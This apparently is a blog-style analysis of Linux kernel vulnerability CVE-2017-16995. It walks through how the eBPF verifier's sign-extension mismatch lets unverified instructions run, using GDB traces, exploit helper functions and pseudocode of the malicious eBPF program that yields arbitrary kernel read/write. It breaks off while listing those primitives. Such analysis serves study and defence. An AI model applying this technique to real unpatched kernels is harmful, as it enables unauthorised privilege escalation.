Analysis of CVE-2017-16995

Introduction

In this post, I will give a detailed explanation of the exploit development for CVE-2017-16995. This post is based on [1][2][3] and adds more debugging information for a better understanding. It is divided into three parts. Part I discusses what eBPF is, the basic data structures used in eBPF, and how the eBPF program given in the exploit in [1] should be interpreted. Part II analyzes the root cause of the vulnerability. Part III explains how the exploit is developed, from arbitrary read/write to privilege escalation.

Testing Environment

This test is carried out on Linux kernel 4.4.33 [4], built with CONFIG_BPF and CONFIG_DEBUG_INFO. The image file is created with the same method as in my previous post on setting up a QEMU debug environment.
We use GDB+QEMU for debugging. Though this is less convenient than debugging a virtual machine in VirtualBox, it is enough to get the information necessary to explain this vulnerability.

extended BPF

In my previous posts, I explained what BPF (Berkeley Packet Filter) is, which is also called cBPF (classic BPF). In this post, I will talk about eBPF (extended BPF). eBPF reuses some of the macros defined for cBPF, but it also extends the instruction set to implement more operations. To support those operations, eBPF also uses different data structures from cBPF.
The core data structure is struct bpf_insn as below:

struct bpf_insn {
	__u8	code;		/* opcode */
	__u8	dst_reg:4;	/* dest register */
	__u8	src_reg:4;	/* source register */
	__s16	off;		/* signed offset */
	__s32	imm;		/* signed immediate constant */
};

In eBPF, a struct bpf_insn is an 8-byte value. Bits [0-7] denote the opcode of the instruction, bits [8-11] the destination register, bits [12-15] the source register, bits [16-31] the signed offset used by the operation, and bits [32-63] the signed immediate value.

The functions that run the eBPF program are mostly located in kernel/bpf/core.c. According to the macros given in that file, there are 11 registers available to eBPF instructions.

/*
 * All registers are 64-bit.
 * R0 - return register
 * R1-R5 argument passing registers
 * R6-R9 callee saved registers
 * R10 - frame pointer read-only
 */

/* Registers */
#define BPF_R0	regs[BPF_REG_0]
#define BPF_R1	regs[BPF_REG_1]
#define BPF_R2	regs[BPF_REG_2]
#define BPF_R3	regs[BPF_REG_3]
#define BPF_R4	regs[BPF_REG_4]
#define BPF_R5	regs[BPF_REG_5]
#define BPF_R6	regs[BPF_REG_6]
#define BPF_R7	regs[BPF_REG_7]
#define BPF_R8	regs[BPF_REG_8]
#define BPF_R9	regs[BPF_REG_9]
#define BPF_R10	regs[BPF_REG_10]

/* Named registers */
#define DST	regs[insn->dst_reg]
#define SRC	regs[insn->src_reg]
#define FP	regs[BPF_REG_FP]
#define ARG1	regs[BPF_REG_ARG1]
#define CTX	regs[BPF_REG_CTX]
#define IMM	insn->imm

According to the comments in core.c, we can see the basic usage of those registers:

JMP_CALL:
	/* Function call scratches BPF_R1-BPF_R5 registers,
	 * preserves BPF_R6-BPF_R9, and stores return value
	 * into BPF_R0.
	 */
	BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3, BPF_R4, BPF_R5);
	CONT;

To understand the meaning of the bytecode sequences given in [1], I wrote an auxiliary program to translate the eBPF bytecode into readable form. The program is given in [5].
The picture below shows the disassembled bytecode.

Pic 1. The ebpf programme

One thing to note is that the authors of [2] and [3] both state that there are 41 instructions in the eBPF program, but there are actually only 40. There is one special case: opcode 0x18 (BPF_LD|BPF_IMM|BPF_DW), whose implementation in kernel/bpf/core.c is given below:

#define CONT	 ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

LD_IMM_DW:
	DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
	insn++;
	CONT;

Therefore, an instruction starting with LD_IMM_DW actually takes 16 bytes rather than 8.

Next we are going to discuss how this eBPF code results in EoP.

Vulnerability Analysis

This section discusses the root cause of the vulnerability, which involves two critical functions in the bpf module: bpf_check in kernel/bpf/verifier.c and __bpf_prog_run in kernel/bpf/core.c.

__bpf_prog_run is the function that emulates the operation of an eBPF program with the given registers and memory layout. This is the function we use to gain arbitrary read/write primitives during the exploit.
bpf_check is the function that checks the validity of an eBPF program submitted from user space. The comments in kernel/bpf/verifier.c describe its usage.

/* bpf_check() is a static code analyzer that walks eBPF program
 * instruction by instruction and updates register/stack state.
 * All paths of conditional branches are analyzed until 'bpf_exit' insn.
 *
 * The first pass is depth-first-search to check that the program is a DAG.
 * It rejects the following programs:
 * - larger than BPF_MAXINSNS insns
 * - if loop is present (detected via back-edge)
 * - unreachable insns exist (shouldn't be a forest. program = one function)
 * - out of bounds or malformed jumps
 * The second pass is all possible path descent from the 1st insn.
 * Since it's analyzing all pathes through the program, the length of the
 * analysis is limited to 32k insn, which may be hit even if total number of
 * insn is less then 4K, but there are too many branches that change stack/regs.
 * Number of 'branches to be analyzed' is limited to 1k
 */

The first pass is implemented in check_cfg; this is not the function we care about for CVE-2017-16995.
The second pass is implemented in do_check; this is where the vulnerability starts. This function checks every feasible execution path in the eBPF program and emulates the execution based on the program state.

Function do_check

As shown in the disassembled eBPF program, the first two instructions are:

(0) BPF_ALU|BPF_MOV|BPF_K
(1) BPF_JMP|BPF_JNE|BPF_K

I will first explain how these two instructions are processed based on the source code, and then give debugging information for a better understanding.

BPF_ALU|BPF_MOV|BPF_K

First, let's observe the code responsible for processing BPF_ALU instructions:

if (class == BPF_ALU || class == BPF_ALU64) {
          err = check_alu_op(env, insn);
          if (err)
                  return err;
}

check_alu_op is then invoked to check the validity of the instruction.

/* check validity of 32-bit and 64-bit arithmetic operations */
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
       //code responsible for processing BPF_ALU|BPF_MOV|BPF_K
       else if (opcode == BPF_MOV) {
		if (BPF_SRC(insn->code) == BPF_X) {
			if (insn->imm != 0 || insn->off != 0) {
				verbose("BPF_MOV uses reserved fields\n");
				return -EINVAL;
			}

			/* check src operand */
			err = check_reg_arg(regs, insn->src_reg, SRC_OP);
			if (err)
				return err;
		} else {
			if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
				verbose("BPF_MOV uses reserved fields\n");
				return -EINVAL;
			}
		}

		/* check dest operand */
		err = check_reg_arg(regs, insn->dst_reg, DST_OP);
		if (err)
			return err;

		if (BPF_SRC(insn->code) == BPF_X) {
			if (BPF_CLASS(insn->code) == BPF_ALU64) {
				/* case: R1 = R2
				 * copy register state to dest reg
				 */
				regs[insn->dst_reg] = regs[insn->src_reg];
			} else {
				if (is_pointer_value(env, insn->src_reg)) {
					verbose("R%d partial copy of pointer\n",
						insn->src_reg);
					return -EACCES;
				}
				regs[insn->dst_reg].type = UNKNOWN_VALUE;
				regs[insn->dst_reg].map_ptr = NULL;
			}
		} else {
			/* case: R = imm
			 * remember the value we stored into this reg
			 */
			regs[insn->dst_reg].type = CONST_IMM;
			regs[insn->dst_reg].imm = insn->imm;
		}
       }
}

In eBPF, BPF_K denotes that the source value is an immediate, while BPF_X denotes that the source value comes from a register. From the code above, we can see that the last two statements handle the BPF_K case.

struct reg_state {
	enum bpf_reg_type type;
	union {
		/* valid when type == CONST_IMM | PTR_TO_STACK */
		int imm;

		/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
		 *   PTR_TO_MAP_VALUE_OR_NULL
		 */
		struct bpf_map *map_ptr;
	};
};
//declaration of regs
struct reg_state *regs = state->regs;

//usage of regs
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;

Here, we can see that the immediate value is retrieved from the instruction and stored into the corresponding reg_state. Note that regs[insn->dst_reg].imm and insn->imm are both signed 32-bit integers.

BPF_JMP|BPF_JNE|BPF_K

Then we come to the second instruction. For this instruction, do_check has to decide which branch to take. In principle, both branches of a conditional jump should be analyzed; however, do_check emulates the execution state of the program to prune the search paths. Now, let's read the code.

else if (class == BPF_JMP) {
        u8 opcode = BPF_OP(insn->code);
        if (opcode == BPF_CALL) {
               //some code
        }
        else if (opcode == BPF_JA) {
               //some code
        }
        else if (opcode == BPF_EXIT) {
               //some code
        }else {
               err = check_cond_jmp_op(env, insn, &insn_idx);
               if (err)
                        return err;
        }
}

We can see that check_cond_jmp_op is responsible for deciding which branch to take next. We can quickly locate the key code:

if (BPF_SRC(insn->code) == BPF_K &&
            (opcode == BPF_JEQ || opcode == BPF_JNE) &&
            regs[insn->dst_reg].type == CONST_IMM &&
            regs[insn->dst_reg].imm == insn->imm) {
                if (opcode == BPF_JEQ) {
                        /* if (imm == imm) goto pc+off;
                         * only follow the goto, ignore fall-through
                         */
                        *insn_idx += insn->off;
                        return 0;
                } else {
                        /* if (imm != imm) goto pc+off;
                         * only follow fall-through branch, since
			 * that's where the program will go
			 */
			return 0;
		}
	}

We can observe that in this situation, check_cond_jmp_op emulates the bpf program execution. At this point, it is still comparing two signed integers. Based on the immediate values given in the eBPF program, the fall-through branch is taken and the other branch is ignored. In my final exploit, I tried to print the bpf instructions, but only the first four instructions are printed out:

0: (b4) (u32) r9 = (u32) -1
1: (55) if r9 != 0xffffffff goto pc+2
2: (b7) r0 = 0
3: (95) exit

The critical point is that the verifier believes only the fall-through branch will be taken, so the other 36 instructions are left unverified.
With proper breakpoints and a little reverse engineering, we can get the following output from the debugger:

Breakpoint 1 at 0xffffffff81112e10: file kernel/bpf/verifier.c, line 1168.
Breakpoint 2 at 0xffffffff81112e20: file kernel/bpf/verifier.c, line 1168.
Breakpoint 3 at 0xffffffff8111318e: file kernel/bpf/verifier.c, line 1219.

Breakpoint 1, check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1168
1168				regs[insn->dst_reg].imm = insn->imm;
$1 = 0xffffc90000a8f028
0xffffc90000a8f028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000a8f038:	0x00000000000000b7	0x0000000000000095
=> 0xffffffff81112e10 <bpf_check+7024>:	movzbl 0x1(%r13),%eax
   0xffffffff81112e15 <bpf_check+7029>:	mov    0x4(%r13),%edx
   0xffffffff81112e19 <bpf_check+7033>:	and    $0xf,%eax
   0xffffffff81112e1c <bpf_check+7036>:	shl    $0x4,%rax
   0xffffffff81112e20 <bpf_check+7040>:	mov    %edx,0x8(%rbx,%rax,1)

Breakpoint 2, 0xffffffff81112e20 in check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1168
1168				regs[insn->dst_reg].imm = insn->imm;
=> 0xffffffff81112e20 <bpf_check+7040>:	mov    %edx,0x8(%rbx,%rax,1)
$2 = 0xffffffff

Breakpoint 3, 0xffffffff8111318e in check_cond_jmp_op (insn_idx=<optimized out>, insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1219
1219		    regs[insn->dst_reg].type == CONST_IMM &&
=> 0xffffffff8111318e <bpf_check+7918>:	cmp    %ecx,0x8(%rax)
   0xffffffff81113191 <bpf_check+7921>:	jne    0xffffffff81112cbc <bpf_check+6684>
   0xffffffff81113197 <bpf_check+7927>:	cmpb   $0x10,-0x78(%rbp)
   0xffffffff8111319b <bpf_check+7931>:	jne    0xffffffff81111edf <bpf_check+3135>
rcx            0xffffffff	0xffffffff
$3 = 0xffff88007b9e70a8
0xffff88007b9e70a8:	0x0000000000000008	0x00000000ffffffff

At breakpoint 1, we can observe that the verifier has started to process the bytecode at 0xffffc90000a8f028.
At breakpoint 2, it moves a 32-bit value into the corresponding register.
At breakpoint 3, the value in $rcx is retrieved from the instruction. $rax is a pointer to corresponding struct reg_state, whose type is CONST_IMM (0x8) and value stored in is 0xffffffff.

Function __bpf_prog_run

The core part of function __bpf_prog_run is a large jump table shown as below:

static const void *jumptable[256] = {
	[0 ... 255] = &&default_label,
	/* Now overwrite non-defaults ... */
	/* 32 bit ALU operations */
	[BPF_ALU | BPF_ADD | BPF_X] = &&ALU_ADD_X,
	[BPF_ALU | BPF_ADD | BPF_K] = &&ALU_ADD_K,
	[BPF_ALU | BPF_SUB | BPF_X] = &&ALU_SUB_X,
	[BPF_ALU | BPF_SUB | BPF_K] = &&ALU_SUB_K,
        //more entries below
}

Based on the opcode of each instruction, the interpreter jumps to the corresponding code snippet for further processing. Now let's observe what happens to the first two instructions of the exploit.

#define DST	regs[insn->dst_reg]
#define SRC	regs[insn->src_reg]
#define FP	regs[BPF_REG_FP]
#define ARG1	regs[BPF_REG_ARG1]
#define CTX	regs[BPF_REG_CTX]
#define IMM	insn->imm

//definition of regs
u64 regs[MAX_BPF_REG], tmp;

//jump branch for BPF_ALU|BPF_MOV|BPF_K
ALU_MOV_K:
	DST = (u32) IMM;
	CONT;

//jump branch for BPF_JMP|BPF_JNE|BPF_K
JMP_JNE_K:
	if (DST != IMM) {
		insn += insn->off;
		CONT_JMP;
	}
	CONT;

With the information given above, we can quickly locate the problematic code. regs here is different from the regs in do_check: it is an array of unsigned 64-bit values.
For the first instruction (BPF_ALU|BPF_MOV|BPF_K), the int immediate -1 (0xffffffff) is cast to an unsigned 32-bit value and then assigned to the unsigned 64-bit register, so the value stored in DST is 0x00000000ffffffff (zero-extended).
For the second instruction (BPF_JMP|BPF_JNE|BPF_K), DST holds 0x00000000ffffffff, while IMM (-1) is sign-extended to 0xffffffffffffffff by the usual arithmetic conversions before the 64-bit comparison. The two values differ, so this time the jump branch is taken and the unverified, malicious bpf instructions are executed.

Breakpoint 1 at 0xffffffff8110ed7a: file kernel/bpf/core.c, line 350.
Breakpoint 2 at 0xffffffff8110ed88: file kernel/bpf/core.c, line 350.
Breakpoint 3 at 0xffffffff8110e8e1: file kernel/bpf/core.c, line 496.
Breakpoint 4 at 0xffffffff8110e8ec: file kernel/bpf/core.c, line 496.

Breakpoint 1, __bpf_prog_run (ctx=0xffff88007a70d100, insn=0xffffc90000adb028) at kernel/bpf/core.c:350
350			DST = (u32) IMM;
=> 0xffffffff8110ed7a <__bpf_prog_run+3066>:	movzbl 0x1(%rbx),%eax
   0xffffffff8110ed7e <__bpf_prog_run+3070>:	mov    0x4(%rbx),%edi
   0xffffffff8110ed81 <__bpf_prog_run+3073>:	add    $0x8,%rbx
   0xffffffff8110ed85 <__bpf_prog_run+3077>:	and    $0xf,%eax
   0xffffffff8110ed88 <__bpf_prog_run+3080>:	mov    %rdi,-0x270(%rbp,%rax,8)
0xffffc90000adb028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000adb038:	0x00000000000000b7	0x0000000000000095

Breakpoint 2, 0xffffffff8110ed88 in __bpf_prog_run (ctx=<optimized out>, insn=0xffffc90000adb030) at kernel/bpf/core.c:350
350			DST = (u32) IMM;
=> 0xffffffff8110ed88 <__bpf_prog_run+3080>:	mov    %rdi,-0x270(%rbp,%rax,8)
$1 = 0xffffffff

Breakpoint 3, __bpf_prog_run (ctx=0xffffffff, insn=0xffffc90000adb030) at kernel/bpf/core.c:496
496			if (DST != IMM) {
=> 0xffffffff8110e8e1 <__bpf_prog_run+1889>:	movzbl 0x1(%rbx),%eax
   0xffffffff8110e8e5 <__bpf_prog_run+1893>:	movslq 0x4(%rbx),%rdx
   0xffffffff8110e8e9 <__bpf_prog_run+1897>:	and    $0xf,%eax
   0xffffffff8110e8ec <__bpf_prog_run+1900>:	cmp    %rdx,-0x270(%rbp,%rax,8)
   0xffffffff8110e8f4 <__bpf_prog_run+1908>:	je     0xffffffff8110f4ce <__bpf_prog_run+4942>
0xffffc90000adb030:	0xffffffff00020955	0x00000000000000b7
0xffffc90000adb040:	0x0000000000000095	0x7c521e8000000918

Breakpoint 4, 0xffffffff8110e8ec in __bpf_prog_run (ctx=0xffffffff, insn=0xffffc90000adb030) at kernel/bpf/core.c:496
496			if (DST != IMM) {
=> 0xffffffff8110e8ec <__bpf_prog_run+1900>:	cmp    %rdx,-0x270(%rbp,%rax,8)
rdx            0xffffffffffffffff	0xffffffffffffffff
rax            0x9	0x9
0xffff88007c10ba70:	0x0000000000000000	0xffff88007a70d100
0xffff88007c10ba80:	0xffffffff8114032d	0xffff88007c10ba98
0xffff88007c10ba90:	0xffffffff8114032d	0xffff88007c10bb90
0xffff88007c10baa0:	0x0000000000000246	0x0000000000000000
0xffff88007c10bab0:	0xffff88007ffdc738	0x00000000ffffffff

At breakpoint 2, we can see that it is 0xffffffff that is stored into the corresponding register.
At breakpoint 4, at the time of the comparison, the sign-extended value 0xffffffffffffffff (in rdx) is compared with the 0xffffffff stored in the register. Of course they are not equal, so the jump branch is taken and the execution flow enters the malicious code.

Exploit

Function replace_map_fd_with_map_ptr

Before diving into exploit development, we need to talk about another function, replace_map_fd_with_map_ptr. It is called before do_check inside bpf_check.

We set breakpoints at the allocation of the bpf_map and at the first call to do_check:

Breakpoint 1, 0xffffffff811102f7 in bpf_map_new_fd (map=<optimized out>) at kernel/bpf/syscall.c:122
122		return anon_inode_getfd("bpf-map", &bpf_map_fops, map,
$1 = 0xffff88007741d900
0xffff88007741d900:	0x0000000200000001	0x0000000800000004
0xffff88007741d910:	0x0000000100000003	0xffff88007c405e00
0xffff88007741d920:	0xffffffff81a14060	0x0000000000000000
0xffff88007741d930:	0x0000000000000000	0x0000000000000000
0xffff88007741d940:	0x0000000000000000	0x0000000000000001
0xffff88007741d950:	0x0000000000000008	0x0000000000000000
0xffff88007741d960:	0x0000000000000000	0x0000000000000000
0xffff88007741d970:	0x0000000000000000	0x0000000000000000
0xffff88007741d980:	0xffff88007741de00	0xffffffff811b78a0
$2 = {map = {refcnt = {counter = 0x1}, map_type = 0x2, key_size = 0x4, value_size = 0x8, max_entries = 0x3, pages = 0x1, user = 0xffff88007c405e00, ops = 0xffffffff81a14060, work = {data = {counter = 0x0}, entry = {next = 0x0, prev = 0x0}, func = 0x0}, usercnt = {counter = 0x1}}, elem_size = 0x8, owner_prog_type = 0x0, owner_jited = 0x0, {value = 0xffff88007741d960, ptrs = 0xffff88007741d960}}

Breakpoint 2, bpf_prog_load (attr=0xffff88007c86fee0) at kernel/bpf/syscall.c:653
653		if (!prog)
$3 = 0xffffc90000b01000

Breakpoint 3, do_check (env=<optimized out>) at kernel/bpf/verifier.c:1717
1717		insn_idx = 0;
0xffffc90000b01028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000b01038:	0x00000000000000b7	0x0000000000000095
0xffffc90000b01048:	0x7741d90000001918	0xffff880000000000
0xffffc90000b01058:	0x00000000000091bf	0x000000000000a2bf
0xffffc90000b01068:	0xfffffffc00000207	0x00000000fffc0a62
0xffffc90000b01078:	0x0000000100000085	0x0000000000010055

At this time, the instructions at 0xffffc90000b01048 and 0xffffc90000b01050 are 0x7741d90000001918 and 0xffff880000000000. The imm parts of the two instructions are 0x7741d900 and 0xffff8800, and the allocated bpf_map is at 0xffff88007741d900, which means the instructions have been patched by the kernel. That's exactly what replace_map_fd_with_map_ptr does. Let's read the code:

if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
        struct bpf_map *map;
        struct fd f;
        //some checking code
        /* store map pointer inside BPF_LD_IMM64 instruction */
        insn[0].imm = (u32) (unsigned long) map;
        insn[1].imm = ((u64) (unsigned long) map) >> 32;
}

From the code above, we can see that the 64-bit map pointer is split into two 32-bit values stored in the imm fields of two consecutive instructions. These values will be used in the later exploitation.

Information Leakage: __get_fp

We list the code that is utilized to get the frame pointer in the exploit.

#define __update_elem(a, b, c) \
	bpf_update_elem(0, (a)); \
	bpf_update_elem(1, (b)); \
	bpf_update_elem(2, (c)); \
	writemsg();

static uint64_t get_value(int key) {
	uint64_t value;

	if (bpf_lookup_elem(&key, &value))
		__exit(strerror(errno));

	return value;
}

static uint64_t __get_fp(void) {
	__update_elem(1, 0, 0);
	return get_value(2);
}

To put it simply, the information leak is divided into two steps:
Step 1: Update the array elements in the bpf_map via bpf_update_elem, and invoke writemsg to trigger execution of the malicious eBPF program.
Step 2: Leak the value of the frame pointer via bpf_lookup_elem.

I will discuss what happens in the malicious eBPF program in the next subsection; first, I will discuss how the information is leaked to user space. Let's set a breakpoint at the exit point of the program. At this point, the malicious program has executed successfully and the desired value has been written into the bpf_map.

Breakpoint 1 at 0xffffffff811102f7: file kernel/bpf/syscall.c, line 122.
Breakpoint 2 at 0xffffffff8110f7fd: file kernel/bpf/syscall.c, line 653.
Breakpoint 3 at 0xffffffff8110e6e8: file kernel/bpf/core.c, line 562.

Breakpoint 1, 0xffffffff811102f7 in bpf_map_new_fd (map=<optimized out>) at kernel/bpf/syscall.c:122
122		return anon_inode_getfd("bpf-map", &bpf_map_fops, map,
$1 = 0xffff88007741d800
0xffff88007741d800:	0x0000000200000001	0x0000000800000004
0xffff88007741d810:	0x0000000100000003	0xffff88007c405e00
0xffff88007741d820:	0xffffffff81a14060	0x0000000000000000
0xffff88007741d830:	0x0000000000000000	0x0000000000000000
0xffff88007741d840:	0x0000000000000000	0x0000000000000001
0xffff88007741d850:	0x0000000000000008	0x0000000000000000
0xffff88007741d860:	0x0000000000000000	0x0000000000000000
0xffff88007741d870:	0x0000000000000000	0x0000000000000000
0xffff88007741d880:	0x0000000000000001	0xffff88007c9ebde8
0xffff88007741d890:	0x0000000000000000	0x0000000000000000
$2 = {map = {refcnt = {counter = 0x1}, map_type = 0x2, key_size = 0x4, value_size = 0x8, max_entries = 0x3, pages = 0x1, user = 0xffff88007c405e00, ops = 0xffffffff81a14060, work = {data = {counter = 0x0}, entry = {next = 0x0, prev = 0x0}, func = 0x0}, usercnt = {counter = 0x1}}, elem_size = 0x8, owner_prog_type = 0x0, owner_jited = 0x0, {value = 0xffff88007741d860, ptrs = 0xffff88007741d860}}

Breakpoint 2, bpf_prog_load (attr=0xffff88007c86fee0) at kernel/bpf/syscall.c:653
653		if (!prog)
$3 = 0xffffc90000b3a000

Breakpoint 3, __bpf_prog_run (ctx=0xffff88007741d800, insn=0xffffc90000b3a158) at kernel/bpf/core.c:562
562			return BPF_R0;
0xffff88007741d800:	0x0000000200000002	0x0000000800000004
0xffff88007741d810:	0x0000000100000003	0xffff88007c405e00
0xffff88007741d820:	0xffffffff81a14060	0x0000000000000000
0xffff88007741d830:	0x0000000000000000	0x0000000000000000
0xffff88007741d840:	0x0000000000000000	0x0000000000000001
0xffff88007741d850:	0x0000000000000008	0x0000000000000000
0xffff88007741d860:	0x0000000000000001	0x0000000000000000
0xffff88007741d870:	0xffff88007c86fcc8	0x0000000000000000
0xffff88007741d880:	0x0000000000000001	0xffff88007c9ebde8
0xffff88007741d890:	0x0000000000000000	0x0000000000000000
$4 = {map = {refcnt = {counter = 0x2}, map_type = 0x2, key_size = 0x4, value_size = 0x8, max_entries = 0x3, pages = 0x1, user = 0xffff88007c405e00, ops = 0xffffffff81a14060, work = {data = {counter = 0x0}, entry = {next = 0x0, prev = 0x0}, func = 0x0}, usercnt = {counter = 0x1}}, elem_size = 0x8, owner_prog_type = 0x0, owner_jited = 0x0, {value = 0xffff88007741d860, ptrs = 0xffff88007741d860}}
(gdb) x/20gx $3+0x28
0xffffc90000b3a028:	0xffffffff000009b4	0xffffffff00020955
0xffffc90000b3a038:	0x00000000000000b7	0x0000000000000095
0xffffc90000b3a048:	0x7741d80000000918	0xffff880000000000
0xffffc90000b3a058:	0x00000000000091bf	0x000000000000a2bf
0xffffc90000b3a068:	0xfffffffc00000207	0x00000000fffc0a62
0xffffc90000b3a078:	0x00005d1000000085	0x0000000000010055
0xffffc90000b3a088:	0x0000000000000095	0x0000000000000679
0xffffc90000b3a098:	0x00000000000091bf	0x000000000000a2bf
0xffffc90000b3a0a8:	0xfffffffc00000207	0x00000001fffc0a62
0xffffc90000b3a0b8:	0x00005d1000000085	0x0000000000010055
(gdb) x/20gx $rbp-0x270
0xffff88007c86fa70:	0x0000000000000000	0xffff88007741d800
0xffff88007c86fa80:	0xffff88007741d870	0xffff88007c86fa98
0xffff88007c86fa90:	0xffffffff8114032d	0xffff88007c86fb90
0xffff88007c86faa0:	0x0000000000000001	0x0000000000000000
0xffff88007c86fab0:	0x0000000000000000	0xffff88007741d800
0xffff88007c86fac0:	0xffff88007c86fcc8(R10)	0xffff88007ffdc600
0xffff88007c86fad0:	0xffff88007ffdc6f0	0x0000000000000000
0xffff88007c86fae0:	0x0000000000000138	0x00000000000000f0
0xffff88007c86faf0:	0x00000000000000c0	0xffff88007fc18aa0
0xffff88007c86fb00:	0xffff88007c86fc68	0xffff88007fc18aa0
(gdb) x/8gx $rbx
0xffffc90000b3a158:	0x0000000000000095	0x000000000000877b
0xffffc90000b3a168:	0x0000000000000095	0x0000000000000000
0xffffc90000b3a178:	0x0000000000000000	0x0000000000000000
0xffffc90000b3a188:	0x0000000000000000	0x0000000000000000

At breakpoint 1, we learn that a bpf_map with 3 entries is created at 0xffff88007741d800, whose value array is at 0xffff88007741d860.
At breakpoint 3, the exit point of the bpf program, we can see that the value at 0xffff88007741d870 has been modified to 0xffff88007c86fcc8. After checking the registers, we find that 0xffff88007c86fcc8 is exactly the value in R10, which serves as the frame pointer of the bpf program.

With this knowledge in mind, let's see how the value in R10 is leaked to user space via map_lookup_elem.

With some debugging, we can quickly find the functions that actually perform these operations:

Breakpoint 4, 0xffffffff81110487 in map_update_elem (attr=<optimized out>) at kernel/bpf/syscall.c:321
321		err = map->ops->map_update_elem(map, key, value, attr->flags);
=> 0xffffffff81110487 <SyS_bpf+1767>:	callq  *0x20(%rax)
   0xffffffff81114790 <array_map_update_elem>:	cmp    $0x2,%rcx

Breakpoint 5, 0xffffffff81110209 in map_lookup_elem (attr=<optimized out>) at kernel/bpf/syscall.c:255
255		ptr = map->ops->map_lookup_elem(map, key);
=> 0xffffffff81110209 <SyS_bpf+1129>:	callq  *0x18(%rax)
   0xffffffff811146e0 <array_map_lookup_elem>:	mov    (%rsi),%eax

The code of array_map_lookup_elem and array_map_update_elem is simple and straightforward.

/* Called from syscall or from eBPF program */
static int array_map_update_elem(struct bpf_map *map, void *key, void *value,
				 u64 map_flags)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (map_flags > BPF_EXIST)
		/* unknown flags */
		return -EINVAL;

	if (index >= array->map.max_entries)
		/* all elements were pre-allocated, cannot insert a new one */
		return -E2BIG;

	if (map_flags == BPF_NOEXIST)
		/* all elements already exist */
		return -EEXIST;

	memcpy(array->value + array->elem_size * index, value, map->value_size);
	return 0;
}

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (index >= array->map.max_entries)
		return NULL;

	return array->value + array->elem_size * index;
}

Here I will only use the binary code of array_map_lookup_elem to explain how R10 is leaked in the end; the same story goes for array_map_update_elem.

(gdb) disassemble 0xffffffff811146e0
Dump of assembler code for function array_map_lookup_elem:
   0xffffffff811146e0 <+0>:	mov    (%rsi),%eax
   0xffffffff811146e2 <+2>:	cmp    %eax,0x10(%rdi)
   0xffffffff811146e5 <+5>:	push   %rbp
   0xffffffff811146e6 <+6>:	mov    %rsp,%rbp
   0xffffffff811146e9 <+9>:	jbe    0xffffffff811146f6 <array_map_lookup_elem+22>
   0xffffffff811146eb <+11>:	imul   0x50(%rdi),%eax
   0xffffffff811146ef <+15>:	pop    %rbp
   0xffffffff811146f0 <+16>:	lea    0x60(%rdi,%rax,1),%rax
   0xffffffff811146f5 <+21>:	retq   
   0xffffffff811146f6 <+22>:	xor    %eax,%eax
   0xffffffff811146f8 <+24>:	pop    %rbp
   0xffffffff811146f9 <+25>:	retq   
End of assembler dump.

With some debugging work, we can read the necessary information as below:

Breakpoint 6, array_map_lookup_elem (map=0xffff88007c65df00, key=0xffff88007bad7010) at kernel/bpf/arraymap.c:73
73		return array->value + array->elem_size * index;
=> 0xffffffff811146f0 <array_map_lookup_elem+16>:	lea    0x60(%rdi,%rax,1),%rax
rdi            0xffff88007c65df00	0xffff88007c65df00
rax            0x10	0x10
0xffff88007c65df00:	0x0000000200000002	0x0000000800000004
0xffff88007c65df10:	0x0000000100000003	0xffff88007c405e00
0xffff88007c65df20:	0xffffffff81a14060	0x0000000000000000
0xffff88007c65df30:	0x0000000000000000	0x0000000000000000
0xffff88007c65df40:	0x0000000000000000	0x0000000000000001
0xffff88007c65df50:	0x0000000000000008	0x0000000000000000
0xffff88007c65df60:	0x0000000000000001	0x0000000000000000
0xffff88007c65df70:	0xffff88007a41bcc8	0x0000000000000000
0xffff88007c65df80:	0xffffc900007db000	0xffffc900007df000
0xffff88007c65df90:	0x0000000000000001	0xffff88007c65de99

After this instruction, a pointer with value 0xffff88007c65df70 is returned, and the value at this location is fetched and copied to user space.
The attacker then repeats the steps above and saves the leaked address.

Data-oriented programming: the eBPF program

Now let's discuss what happens in the malicious eBPF program.
First of all, let me translate the eBPF program in Pic 1 into readable pseudocode:

R1 = bpf_map;
R2 = R10;
R2 = R2 - 4;
*(R10-4) = 0;
R0 = call ebpf_map_lookup_elem(R1, R2); // R1 is pointer to bpf_map, *R2 is 0
if(R0 == 0)
     JUMP_EXIT
R6 = *R0

R1 = bpf_map;
R2 = R10;
R2 = R2 - 4;
*(R10-4) = 1;
R0 = call ebpf_map_lookup_elem(R1, R2); // R1 is pointer to bpf_map, *R2 is 1
if(R0 == 0)
     JUMP_EXIT
R7 = *R0

R1 = bpf_map;
R2 = R10;
R2 = R2 - 4;
*(R10-4) = 2;
R0 = call bpf_map_lookup_elem(R1, R2); // R1 is pointer to bpf_map, *R2 is 2
if(R0 == 0)
     JUMP_EXIT
R8 = *R0

R2 = R0;
R0 = 0;

if(R6 == 0)
{
      R3 = *(R7);
      *R2 = R3;
}
else if(R6 == 1)
{
      *R2 = R10;
}
else if(R6 == 2)
{
      *(R7) = R8;
}

Now let’s recall what happens before getting the frame_pointer via bpf_map_lookup_elem.

#define __update_elem(a, b, c) \
	bpf_update_elem(0, (a)); \
	bpf_update_elem(1, (b)); \
	bpf_update_elem(2, (c)); \
	writemsg();

//call __update_elem(1, 0, 0) before calling __get_fp()
__update_elem(1, 0, 0);

According to our analysis of the bpf_map, it contains an array of 3 elements, which are set via bpf_update_elem. The eBPF program performs different operations based on the values set and achieves arbitrary read/write in the end.
Based on the pseudocode given above, we can generalise the logic of the eBPF program.
(1) a = 0: (arbitrary read) read the value at address b and store it into the third element of the bpf_map.
